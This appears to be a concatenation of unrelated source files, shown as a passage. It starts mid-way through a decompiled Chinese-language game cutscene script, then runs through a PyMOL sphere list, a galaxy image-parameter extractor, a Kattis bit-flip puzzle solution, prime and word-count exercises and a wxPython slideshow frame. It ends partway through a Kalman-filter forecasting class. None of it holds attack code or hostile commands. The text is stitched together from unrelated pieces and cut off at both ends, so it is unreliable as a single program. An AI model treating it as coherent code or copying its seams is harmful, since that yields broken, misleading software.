-3300, 0, 250, 45) SetChrPos(0x12, -3800, 0, -1000, 45) SetChrPos(0x8, 0, -1350, 6700, 0) SetChrPos(0xC, 3000, -1350, 6960, 45) SetChrPos(0x101, -750, 250, 200, 0) SetChrPos(0x102, 0, 0, -450, 0) SetChrPos(0x104, 650, 0, -1250, 0) SetChrPos(0x105, 0, 500, 2400, 0) SetChrPos(0x103, -1460, 0, -1190, 0) SetChrPos(0x109, -700, 0, -1770, 0) SetChrPos(0x106, 200, 0, -2200, 0) PlayBGM("ed7583", 0) Sound(498, 1, 80, 0) FadeToBright(1000, 0) OP_68(660, 800, 3830, 0) MoveCamera(44, 18, 0, 0) OP_6E(500, 0) SetCameraDistance(21500, 0) SetCameraDistance(22500, 2000) OP_0D() OP_6F(0x79) Sleep(300) SetMessageWindowPos(95, 70, -1, -1) SetChrName("凯文神父") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "也就是说,\x01", "我们就算进入克洛斯贝尔的领空,\x01", "也不会有遭到攻击的危险吧?\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x105, ( "#10403F#6P嗯,那些神机似乎\x01", "都在专心守卫都市。\x02\x03", "#10400F只要不接近克洛斯贝尔市,\x01", "应该就不会有问题。\x02", ) ) CloseMessageWindow() SetMessageWindowPos(90, -1, -1, -1) SetChrName("凯文神父") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "很好,这样一来,\x01", "总算是有点眉目了……\x02\x03", "天亮之后,我就会返回你们那边。\x02\x03", "至于具体的行动时机,\x01", "就等我们到了之后再商量吧。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x105, "#10402F#6P呵呵,明白了。\x02", ) CloseMessageWindow() SetMessageWindowPos(190, -1, -1, -1) SetChrName("莉丝的声音") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "#2S……凯文,换我说几句。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) Fade(250) OP_70(0x1, 0x1F) Sound(73, 0, 100, 0) OP_0D() Sleep(300) ChrTalk( 0x102, "#00102F#12P莉丝小姐……\x02", ) CloseMessageWindow() SetMessageWindowPos(160, -1, -1, -1) SetChrName("莉丝修女") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "……艾莉小姐,\x01", "你能平安无事,真是太好了。\x02\x03", "还有罗伊德警官和各位,\x01", 
"你们也一样。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x101, "#00002F#12P哈哈,托你们的福。\x02", ) CloseMessageWindow() ChrTalk( 0x104, ( "#00309F#12P哎呀~真没想到会以这种形式\x01", "和莉丝小姐交谈啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0x103, ( "#00202F#12P#N你们会为我们的\x01", "突入作战提供协助吧?\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(140, 70, -1, -1) SetChrName("莉丝修女") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "是的,我们准备用\x01", "这架梅尔卡瓦来吸引\x01", "那些保护都市的神机。\x02\x03", "不过,这样就不能同时对付\x01", "猎兵和国防军了……\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x101, ( "#00004F#12P……这就足够了,\x01", "真是帮了我们的大忙。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#00106F#12P莉丝小姐、凯文神父,\x01", "真不知道该怎么感谢你们……\x02", ) ) CloseMessageWindow() SetMessageWindowPos(90, -1, -1, -1) SetChrName("凯文神父") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "好啦,道谢的话,\x01", "还是留到作战成功之后再说吧。\x02\x03", "其实我们还打算\x01", "带来几个帮手……\x02\x03", "但即使如此,面对那些智能兵器,\x01", "恐怕还是没有什么胜算。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x103, "#00208F#12P#N的确……\x02", ) CloseMessageWindow() OP_57(0x0) OP_5A() ChrTalk( 0x104, ( "#00301F#12P总之,\x01", "你们千万不要太过逞强。\x02", ) ) CloseMessageWindow() SetMessageWindowPos(105, -1, -1, -1) SetChrName("凯文神父") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "哈哈,多谢关心。\x02\x03", "瓦吉,\x01", "我们明天早上见。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x105, "#10400F#6P嗯,我等你们。\x02", ) CloseMessageWindow() SetMessageWindowPos(180, -1, -1, -1) SetChrName("莉丝修女") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "诸位再见。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) Fade(250) OP_70(0x1, 0x1E) Sound(73, 0, 100, 0) OP_0D() Sleep(500) Sound(943, 2, 60, 0) OP_71(0x1, 0x2F, 0x4C, 0x0, 0x8) OP_68(-340, 800, 2640, 2000) MoveCamera(40, 22, 0, 2000) OP_6E(500, 2000) SetCameraDistance(22440, 2000) Sleep(1000) SetChrFlags(0x13, 0x20) def lambda_721E(): TurnDirection(0x11, 0x101, 500) ExitThread() QueueWorkItem(0x11, 0, lambda_721E) Sleep(50) def lambda_722E(): TurnDirection(0x12, 0x101, 500) ExitThread() QueueWorkItem(0x12, 0, lambda_722E) Sleep(50) def lambda_723E(): TurnDirection(0x13, 0x101, 500) ExitThread() QueueWorkItem(0x13, 0, lambda_723E) Sleep(50) WaitChrThread(0x11, 0) WaitChrThread(0x12, 0) WaitChrThread(0x13, 0) OP_6F(0x79) ClearChrFlags(0x13, 0x20) OP_24(0x3AF) Sound(143, 0, 50, 0) Sleep(500) ChrTalk( 0x11, ( "#02501F#5P唔,看来明天\x01", "将会是艰辛的一天啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0x12, ( "#02106F#6P#N是啊……\x01", "单看地面战力的差距,\x01", "也是总统一派占据上风。\x02\x03", "#02101F更麻烦的是,那些智能兵器\x01", "简直强得离谱。\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ChrTalk( 0x106, ( "#10708F#12P据约鲁古大师说,\x01", "那架白色机体已经失去了\x01", "『消灭空间』的能力……\x02\x03", "#10701F不过,它的基础性能\x01", "却没有丝毫减弱吧?\x02", ) ) CloseMessageWindow() SetChrSubChip(0x8, 0x1) Sleep(100) ChrTalk( 0x8, ( "#12100F#5P嗯,恐怕\x01", "正如你所说。\x02\x03", "看来有必要驾驶这艘九号机,\x01", "去探查一下白色机体的状况。\x02", ) ) CloseMessageWindow() ChrTalk( 0x105, ( "#10403F#5P不管怎么说,都市周边一带\x01", "肯定会陷入胶着状态。\x02\x03", "#10401F而整个作战的关键,\x01", "就掌握在我们这些潜入队员的手中。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00003F#12P嗯,我明白。\x02\x03", "#00013F……必须要想办法潜入市内,\x01", "与科长和达德利警官\x01", "他们会合。\x02", ) ) CloseMessageWindow() ChrTalk( 0x104, ( "#00306F#11P话说回来,他们不要紧吧?\x02\x03", "#00301F听说和达德利警官的联络\x01", "在中途断开了。\x02", ) ) CloseMessageWindow() SetChrSubChip(0x9, 0x1) Sleep(200) ChrTalk( 0x9, ( 
"#02305F#5P多半是被通讯终端\x01", "强行切断了信号。\x02\x03", "#02303F终端拥有令特定的艾尼格玛号码\x01", "无法收发信号的机能。\x02", ) ) CloseMessageWindow() SetChrSubChip(0xC, 0x2) Sleep(100) ChrTalk( 0xC, ( "#01901F#5P也就是说,总统一派的人\x01", "在市内可以随意联络,\x01", "而我们却不可以……?\x02", ) ) CloseMessageWindow() ChrTalk( 0x103, ( "#00203F#12P是的,所以我们要\x01", "控制住通讯终端。\x02\x03", "#00208F但通讯终端设置在兰花塔内,\x01", "恐怕无法轻易得手……\x02", ) ) CloseMessageWindow() ChrTalk( 0x109, ( "#10101F#12P总而言之……\x01", "成败与否,全都要看明天早上。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#00103F#12P嗯……\x01", "为了夺回琪雅……\x02\x03", "#00101F我们无论如何也要在\x01", "『解放克洛斯贝尔市作战』中取得成功。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00006F#11P没错……大家今晚要\x01", "好好休息,养精蓄锐。\x02", ) ) CloseMessageWindow() OP_93(0x101, 0xB4, 0x1F4) Sleep(300) ChrTalk( 0x101, ( "#00004F#5P船内有休息室,\x01", "如果累了,可以去里面休息。\x02\x03", "#00000F就让我们以最完美的状态……\x01", "共同迎接明天的早晨吧!\x02", ) ) CloseMessageWindow() Sleep(500) OP_82(0xC8, 0x0, 0xBB8, 0x1F4) SetMessageWindowPos(290, 50, -1, -1) SetChrName("众人") AnonymousTalk( 0xFF, "#4S好!\x02", ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetCameraDistance(22940, 2000) StopSound(498, 2000, 80) FadeToDark(1000, 0, -1) OP_0D() OP_32(0xFF, 0xF9, 0x0) PartySelect(1) ClearChrFlags(0x105, 0x4) ClearParty() AddParty(0x0, 0xFF, 0xFF) SetScenarioFlags(0x1A5, 2) OP_29(0xB0, 0x4, 0x10) OP_29(0xB1, 0x4, 0x2) OP_29(0xB1, 0x1, 0x0) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x79), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_783B") OP_50(0x65, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END))) label("loc_783B") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x7A), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_7852") OP_50(0x66, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END))) label("loc_7852") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x7B), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_7869") OP_50(0x67, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END))) label("loc_7869") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x7D), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_7880") OP_50(0x68, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END))) label("loc_7880") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x7C), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_7897") OP_50(0x69, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END))) label("loc_7897") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x7E), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_78AE") OP_50(0x6A, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END))) label("loc_78AE") OP_21(0xFA0) WaitBGM() Sleep(10) PlayBGM("ed7513", 0) OP_50(0x1, (scpexpr(EXPR_PUSH_LONG, 0x201), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Sound(498, 1, 80, 0) OP_24(0x3AF) Sleep(500) SetScenarioFlags(0x22, 2) NewScene("e302B", 101, 0, 0) IdleLoop() Return() # Function_30_6891 end SaveToFile() Try(main)
from pymol.cgo import * from pymol import cmd CRO_balls = [COLOR, 0.000, 1.000, 1.000, SPHERE, 24.077, 27.513, 36.610, 1.600, SPHERE, 25.011, 26.478, 37.078, 1.800, SPHERE, 25.931, 26.035, 35.930, 1.800, SPHERE, 25.155, 25.422, 34.796, 1.800, SPHERE, 26.679, 27.129, 35.461, 1.500, SPHERE, 25.730, 27.106, 38.245, 1.800, SPHERE, 26.975, 27.732, 38.216, 1.600, SPHERE, 25.274, 27.124, 39.509, 1.600, SPHERE, 26.043, 27.875, 40.370, 1.800, SPHERE, 26.022, 27.962, 41.566, 1.500, SPHERE, 27.197, 28.245, 39.512, 1.800, SPHERE, 23.919, 26.721, 39.842, 1.800, SPHERE, 23.745, 25.326, 40.360, 1.800, SPHERE, 22.885, 25.116, 41.193, 1.500, SPHERE, 28.329, 28.822, 39.960, 1.800, SPHERE, 29.437, 29.370, 39.124, 1.800, SPHERE, 29.541, 29.103, 37.742, 1.800, SPHERE, 30.487, 30.110, 39.805, 1.800, SPHERE, 30.707, 29.546, 37.033, 1.800, SPHERE, 31.614, 30.563, 39.085, 1.800, SPHERE, 31.718, 30.300, 37.721, 1.800, SPHERE, 32.894, 30.804, 36.971, 1.500, ] cmd.load_cgo(CRO_balls, 'CRO_balls') cmd.set('two_sided_lighting', 'on')
import load_data import pysex import numpy as np import multiprocessing as mp import cPickle as pickle """ Extract a bunch of extra info to get a better idea of the size of objects """ SUBSETS = ['train', 'test'] TARGET_PATTERN = "data/pysex_params_gen2_%s.npy.gz" SIGMA2 = 5000 # 5000 # std of the centrality weighting (Gaussian) DETECT_THRESH = 2.0 # 10.0 # detection threshold for sextractor NUM_PROCESSES = 8 def estimate_params(img): img_green = img[..., 1] # supposedly using the green channel is a good idea. alternatively we could use luma. # this seems to work well enough. out = pysex.run(img_green, params=[ 'X_IMAGE', 'Y_IMAGE', # barycenter # 'XMIN_IMAGE', 'XMAX_IMAGE', 'YMIN_IMAGE', 'YMAX_IMAGE', # enclosing rectangle # 'XPEAK_IMAGE', 'YPEAK_IMAGE', # location of maximal intensity 'A_IMAGE', 'B_IMAGE', 'THETA_IMAGE', # ellipse parameters 'PETRO_RADIUS', # 'KRON_RADIUS', 'PETRO_RADIUS', 'FLUX_RADIUS', 'FWHM_IMAGE', # various radii ], conf_args={ 'DETECT_THRESH': DETECT_THRESH }) # x and y are flipped for some reason. # theta should be 90 - theta. # we convert these here so we can plot stuff with matplotlib easily. try: ys = out['X_IMAGE'].tonumpy() xs = out['Y_IMAGE'].tonumpy() as_ = out['A_IMAGE'].tonumpy() bs = out['B_IMAGE'].tonumpy() thetas = 90 - out['THETA_IMAGE'].tonumpy() # kron_radii = out['KRON_RADIUS'].tonumpy() petro_radii = out['PETRO_RADIUS'].tonumpy() # flux_radii = out['FLUX_RADIUS'].tonumpy() # fwhms = out['FWHM_IMAGE'].tonumpy() # detect the most salient galaxy # take in account size and centrality surface_areas = np.pi * (as_ * bs) centralities = np.exp(-((xs - 211.5)**2 + (ys - 211.5)**2)/SIGMA2) # 211.5, 211.5 is the center of the image # salience is proportional to surface area, with a gaussian prior on the distance to the center. saliences = surface_areas * centralities most_salient_idx = np.argmax(saliences) x = xs[most_salient_idx] y = ys[most_salient_idx] a = as_[most_salient_idx] b = bs[most_salient_idx] theta = thetas[most_salient_idx] # kron_radius = kron_radii[most_salient_idx] petro_radius = petro_radii[most_salient_idx] # flux_radius = flux_radii[most_salient_idx] # fwhm = fwhms[most_salient_idx] except TypeError: # sometimes these are empty (no objects found), use defaults in that case x = 211.5 y = 211.5 a = np.nan # dunno what this has to be, deal with it later b = np.nan # same theta = np.nan # same # kron_radius = np.nan petro_radius = np.nan # flux_radius = np.nan # fwhm = np.nan # return (x, y, a, b, theta, flux_radius, kron_radius, petro_radius, fwhm) return (x, y, a, b, theta, petro_radius) for subset in SUBSETS: print "SUBSET: %s" % subset print if subset == 'train': num_images = load_data.num_train ids = load_data.train_ids elif subset == 'test': num_images = load_data.num_test ids = load_data.test_ids def process(k): print "image %d/%d (%s)" % (k + 1, num_images, subset) img_id = ids[k] img = load_data.load_image(img_id, from_ram=True, subset=subset) return estimate_params(img) pool = mp.Pool(NUM_PROCESSES) estimated_params = pool.map(process, xrange(num_images), chunksize=100) pool.close() pool.join() # estimated_params = map(process, xrange(num_images)) # no mp for debugging params_array = np.array(estimated_params) target_path = TARGET_PATTERN % subset print "Saving to %s..." % target_path load_data.save_gz(target_path, params_array)
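# --- Illustration: how the salience ranking above picks the "main" galaxy ---
# A minimal, self-contained sketch of the selection rule in estimate_params:
# salience = ellipse surface area (pi * a * b) weighted by a Gaussian prior on the
# distance to the image centre (211.5, 211.5). The three detections below are
# made-up numbers purely for illustration.
import numpy as np

sigma2 = 5000.0
center = 211.5

# hypothetical (x, y, a, b) values for three detections
xs = np.array([210.0, 50.0, 300.0])
ys = np.array([215.0, 60.0, 310.0])
as_ = np.array([20.0, 40.0, 15.0])
bs = np.array([15.0, 30.0, 10.0])

surface_areas = np.pi * (as_ * bs)
centralities = np.exp(-((xs - center) ** 2 + (ys - center) ** 2) / sigma2)
saliences = surface_areas * centralities

# the larger but off-centre detection (index 1) loses to the central one (index 0)
print(saliences, np.argmax(saliences))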
import fileinput
# Kattis Erase Securely
# https://open.kattis.com/problems/erase

file = fileinput.input()  # defaults to sys.stdin

iterations = int(file.readline())
before = file.readline().strip()
after = file.readline().strip()

copy = ""  # comparison string
d = {'0': '1', '1': '0'}  # dict used to map 0 to 1, and 1 to 0

if iterations % 2 == 1:  # odd number of iterations: equivalent to flipping once
    copy = "".join([d.get(char) for char in before])  # look up the flipped bit for each character
else:  # even number of iterations: the flips cancel out, so nothing changes
    copy = before

if copy == after:
    print("Deletion succeeded")
else:
    print("Deletion failed")
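# --- Illustration: why only the parity of `iterations` matters ---
# Flipping every bit an even number of times restores the original pattern, while any
# odd number of flips is equivalent to a single flip, which is what the check above
# relies on. Tiny self-contained demonstration with a made-up pattern:
flip = {'0': '1', '1': '0'}

pattern = "1010"
once = "".join(flip[c] for c in pattern)   # "0101"
twice = "".join(flip[c] for c in once)     # back to "1010"
assert once != pattern
assert twice == pattern
print(once, twice)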
from math import sqrt # Questions 2 def is_prime_number(x): return (x > 1) and all(x % i for i in range(2, int(sqrt(x)) + 1)) def isSideDigitsEqual(n): sn = str(n) sum1 = sum2 = 0 for i in range(int(len(sn)/2)): sum1 += int(sn[i]) sum2 += int(sn[-i-1]) if sum1 == sum2: return True return False n = 100000 while True: n += 1 if is_prime_number(n) and isSideDigitsEqual(n): print(n) break # Question 3 def sTrim(s): for c in ",.:;?!": s = s.replace(c, "") return s def getWords(fName): words = set() with open(fName) as file: for line in file: for w in filter(None, [sTrim(wd.lower()) for wd in line.split()]): # convert to lower case and remove non-word characters and remove null or empty strings from the list using filter if w[0] == "e" or w[0] == "y": words.add(w) return words words1 = getWords("D:\\Work\\Repositories\\programmingContest\\hamlet.txt") words2 = getWords("D:\\Work\\Repositories\\programmingContest\\romeoAndJuliet.txt") print(len(words1.intersection(words2)))
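# --- Illustration: worked example for isSideDigitsEqual ---
# The helper compares the digit sum of the first half of the number with the digit sum
# of the last half read from the end (the middle digit of an odd-length number is
# ignored). For example, 1230 gives 1 + 2 = 3 on the left and 0 + 3 = 3 on the right,
# so it qualifies; 1240 gives 3 vs 4 and does not. A small standalone check:
def side_digit_sums(n):
    sn = str(n)
    half = len(sn) // 2
    return sum(int(d) for d in sn[:half]), sum(int(d) for d in sn[-1:-half - 1:-1])

print(side_digit_sums(1230))  # (3, 3) -> balanced
print(side_digit_sums(1240))  # (3, 4) -> not balanced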
import wx class SlideshowFrame(wx.Frame): def __init__(self,**kwargs): wx.Frame.__init__(self, **kwargs) self.SetBackgroundColour(wx.BLACK) self.panel = wx.Panel(self, pos=self.Rect.GetPosition(), size=self.Rect.GetSize()) self.empty_img = wx.EmptyImage(self.Rect.GetWidth(), self.Rect.GetHeight()) self.imageCtrl = wx.StaticBitmap(self.panel, wx.ID_ANY, wx.BitmapFromImage(self.empty_img)) #self.verSizer = wx.BoxSizer(wx.VERTICAL) #self.horSizer = wx.BoxSizer(wx.HORIZONTAL) #self.mainSizer.Add(self.imageCtrl, 0, wx.ALL|wx.ALIGN_CENTER, 0) #self.panel.SetSizer(self.mainSizer) #self.mainSizer.Fit(self) #self.panel.Layout() def load_img(self, img_path): if img_path is None: img = self.empty_img else: img = wx.Image(img_path, wx.BITMAP_TYPE_ANY) # # scale the image, preserving the aspect ratio # w = img.GetWidth() h = img.GetHeight() W = self.Rect.GetWidth() H = self.Rect.GetHeight() # scale w to match W, and see if height is over/under H. If so, scale # h to match H instead. w2, h2 = W, h*(float(W)/w) if h2 > H: w2, h2 = w*(float(H)/h), H img = img.Scale(w2,h2,quality=wx.IMAGE_QUALITY_HIGH) self.imageCtrl.SetBitmap(wx.BitmapFromImage(img)) #self.panel.Layout() O = self.Rect.GetPosition() # frame origin X,Y = (O[0] + (W-w2)/2, O[1] + (H-h2)/2) self.panel.SetRect((X,Y,w2,h2)) #self.mainSizer.Fit(self) #self.panel.Layout() self.panel.Refresh()
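# --- Illustration: the aspect-ratio fit used in load_img, as a pure function ---
# A minimal sketch (no wx needed): scale (w, h) so the image fits inside (W, H) while
# preserving the aspect ratio, i.e. the "scale w to match W, fall back to H" logic above.
def fit_inside(w, h, W, H):
    w2, h2 = W, h * (float(W) / w)
    if h2 > H:
        w2, h2 = w * (float(H) / h), H
    return w2, h2

print(fit_inside(400, 300, 1920, 1080))   # height would overflow -> (1440.0, 1080)
print(fit_inside(1000, 200, 1920, 1080))  # width-limited -> (1920, 384.0)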
import numpy as np from scipy.optimize import minimize import time import os import json from models.forecast_model import ForecastModel from distributions.log_normal import LogNormal import utils class KalmanFilter(ForecastModel, LogNormal): """ Implements the probabilistic forecasting model based on double-seasonal HWT Exponential Smoothing (Taylor, 2010) that estimates parameters and creates forecasts in closed form using the linear Kalman Filter (Särkkä, 2013). """ def __init__(self, y, t, u=None, ID='', exp_smooth_fit=False, num_filter_weeks=52): super().__init__(y, t, u, ID) self.dim = 2 + self.s_d + self.s_w if u is not None: self.dim += u.shape[1] # Default parameters [alpha, delta, omega, phi, nu2] self.theta = np.array([0.01, 0.15, 0.15, 0.90, 1e-3]) self.exp_smooth_fit = exp_smooth_fit self.filter_range = min(len(t), num_filter_weeks * self.s_w) # Process noise covariance matrix self.Q_idx = tuple(np.meshgrid( np.array([0, 1, 2, 2 + self.s_d]), np.array([0, 1, 2, 2 + self.s_d]), indexing='ij' )) self.Q = lambda theta: theta[4] * np.outer( np.array([1, theta[0], theta[1], theta[2]]), np.array([1, theta[0], theta[1], theta[2]]) ) self.q = lambda theta: np.hstack([ 1, theta[0], theta[1], np.zeros(self.s_d - 1), theta[2], np.zeros(self.dim - self.s_d - 3) ]) # Measurement noise self.r = lambda theta: 0 # Predicted measurement mean and variance self.mu_y = np.zeros(0) self.sigma2_y = np.zeros(0) # self.results[0]['mu_y'] = [] # self.results[0]['sigma2_y'] = [] # Mean and Variance of the prior state distribution self.m = self.initialize_mean(y, u) self.P = 1e-3 * np.eye(self.dim) # Negative Log Maximum Likelihood Estimate self.mle = 0 self.cnt = 0 params_path = os.path.join(self.get_out_dir(), self.results[0]["ID"] + '.json') if os.path.exists(params_path): with open(params_path, 'r') as fp: res = json.load(fp) self.theta = np.array(res['params']) self.results[0]['params'] = self.theta.tolist() _, _, self.m, self.P, self.mle = self.filter( self.theta, t[-self.filter_range:], u[-self.filter_range:] if u is not None else None, y[-self.filter_range:] ) def __str__(self): return 'KalmanFilter' def fA(self, X, theta, transpose=False): """ Computes the matrix-matrix (AX) or matrix-vector (Ax) multiplication of A and X efficiently. This is possible since A is a sparse matrix. If transpose=True XA^T is computed. 
""" # Transition matrix res = np.empty_like(X) if X.ndim == 1: res[3:] = X[2:self.dim - 1] res[0] = theta[3] * X[0] res[1] = theta[0] * theta[3] * X[0] + X[1] res[2] = theta[1] * theta[3] * X[0] + X[1 + self.s_d] res[2 + self.s_d] = theta[2] * theta[3] * X[0] + X[1 + self.s_d + self.s_w] if self.u is not None: res[2 + self.s_d + self.s_w:] = X[2 + self.s_d + self.s_w:] elif not transpose: res[3:, :] = X[2:self.dim - 1, :] res[0, :] = theta[3] * X[0, :] res[1, :] = theta[0] * theta[3] * X[0, :] + X[1, :] res[2, :] = theta[1] * theta[3] * X[0, :] + X[1 + self.s_d, :] res[2 + self.s_d, :] = theta[2] * theta[3] * X[0, :] + X[1 + self.s_d + self.s_w, :] if self.u is not None: res[2 + self.s_d + self.s_w:, :] = X[2 + self.s_d + self.s_w:, :] else: res[:, 3:] = X[:, 2:self.dim - 1] res[:, 0] = theta[3] * X[:, 0] res[:, 1] = theta[0] * theta[3] * X[:, 0] + X[:, 1] res[:, 2] = theta[1] * theta[3] * X[:, 0] + X[:, 1 + self.s_d] res[:, 2 + self.s_d] = theta[2] * theta[3] * X[:, 0] + X[:, 1 + self.s_d + self.s_w] if self.u is not None: res[:, 2 + self.s_d + self.s_w:] = X[:, 2 + self.s_d + self.s_w:] return res def fh(self, X, theta, u=None): """ Computes the matrix-vector multiplication (Xh) or the inner product (h^T * x) efficiently. """ # Measurement model matrix if X.ndim == 1: res = (1 - theta[0] - theta[1] - theta[2]) * X[0] + X[1] + X[2] + X[2 + self.s_d] if u is not None: res += np.inner(X[2 + self.s_d + self.s_w:], u) else: res = (1 - theta[0] - theta[1] - theta[2]) * X[:, 0] + X[:, 1] + X[:, 2] + X[:, 2 + self.s_d] if u is not None: res += X[:, 2 + self.s_d + self.s_w:] @ u return res def initialize_mean(self, y, u=None): """ Initializes the level, daily, weekly and weather component of the mean vector. """ # Use first 3 weeks of data for initialization y_init = np.log(y[:3 * self.s_w]) # Initialize the residual and the smoothed level e0 = 0 l0 = np.nanmean(y_init) # Initialize the seasonal index for the intraday cycle d0 = np.nanmean(y_init.reshape(-1, self.s_d), axis=0) - l0 # Initialize the seasonal index for the intraweek cycle w0 = np.nanmean(y_init.reshape(-1, self.s_w), axis=0) - np.tile(d0, int(self.s_w / self.s_d)) - l0 # Initialize the weather regression coefficients if u is not None: b0 = -0.01 * np.log(self.y_mean) * np.ones(u.shape[1]) else: b0 = np.zeros(0) return np.hstack((e0, l0, np.flip(d0), np.flip(w0), b0)) def filter(self, theta, t, u=None, y=None, timer=False): """ Implements the Kalman Filter prediction and update steps for the timestamps t. Additionally, the marginal likelihood estimate (MLE) for the parameters theta is computed in the filter recursion. The function returns the distribution parameter estimates mu_y and sigma^2_y for the timestamps t, the state vector m and covariance matrix P from the last iteration and the MLE. 
""" start_time = time.time() # Initialize mu_y = np.zeros(len(t)) sigma2_y = np.zeros(len(t)) m = self.m P = self.P mle = self.mle # Rescale u if u is not None: u = utils.standardize(u, self.u_mean, self.u_std) A = lambda x: self.fA(x, theta) A_T = lambda x: self.fA(x, theta, transpose=True) Q = self.Q(theta) h = lambda x1, x2, x3: self.fh(x1, theta) if x2 is None else self.fh(x1, theta, x2[x3]) r = self.r(theta) # Kalman filter for i in range(len(t)): # Prediction step m = A(m) P = A_T(A(P)) P[self.Q_idx] += Q mu_y[i] = h(m, u, i) Ph = h(P, u, i) sigma2_y[i] = h(Ph, u, i) + r if y is not None and not np.isnan(y[i]): # Update step v = np.log(y[i]) - mu_y[i] s = max(sigma2_y[i], 1e-8) k = Ph / s m += k * v P -= sigma2_y[i] * k[:, np.newaxis] * k mle += 0.5 * np.log(2 * np.pi * s) + 0.5 * v ** 2 / s if timer: self.cnt += 1 print(f'Iteration {self.cnt}: Time = {time.time() - start_time:.4f}s, theta = {theta}') return mu_y, sigma2_y, m, P, mle def exp_smooth(self, theta, t, u=None, y=None, timer=False): """ Implements exponential smoothing for the timestamps t, which provides a fast way to estimate the parameters theta via MLE. However, the Kalman Filter provides better parameter estimates. """ start_time = time.time() # Initialize y_hat = np.zeros(len(t)) m = self.m # Rescale u if u is not None: u = utils.standardize(u, self.u_mean, self.u_std) A = lambda x: self.fA(x, theta) q = self.q(theta) h = lambda x1, x2, x3: self.fh(x1, theta) if x2 is None else self.fh(x1, theta, x2[x3]) # Exponential Smoothing for i in range(len(t)): # Prediction step m = A(m) y_hat[i] = h(m, u, i) if y is not None and not np.isnan(y[i]): # Update step v = np.log(y[i]) - y_hat[i] m += q * v err = (np.log(y) - y_hat) ** 2 mle = len(t) * np.log(np.nansum(err)) eps = np.nanmean(err) if timer: self.cnt += 1 print(f'Iteration {self.cnt}: Time = {time.time() - start_time:.4f}s, theta = {theta}') return mle, eps def fit(self): """ Fits the parameters of the Kalman Filter model by minimizing the Gaussian negative log likelihood with the non-linear optimizer L-BFGS-B. """ super().fit() start_time = time.time() # Initialize self.m = self.initialize_mean(self.y, self.u) self.P = 1e-3 * np.eye(self.dim) self.mle = 0 if self.exp_smooth_fit: res = minimize( fun=lambda theta: self.exp_smooth(theta, self.t, self.u, self.y, timer=True)[0], x0=self.theta[:-1], method='L-BFGS-B', bounds=[(0, 1), (0, 1), (0, 1), (0, 1)], ) self.theta[:-1] = res.x self.theta[-1] = self.exp_smooth(res.x, self.t, self.u, self.y)[1] else: res = minimize( fun=lambda theta: self.filter( theta, self.t[-self.filter_range:], self.u[-self.filter_range:] if self.u is not None else None, self.y[-self.filter_range:], timer=True )[-1], x0=self.theta, method='L-BFGS-B', bounds=[(0, 1), (0, 1), (0, 1), (0, 1), (1e-6, 1)], options={'ftol': 1e-6} ) self.theta = res.x self.results[0]['params'] = self.theta.tolist() print(f'{self.results[0]["ID"]} minimizer: {self.theta}') _, _, self.m, self.P, self.mle = 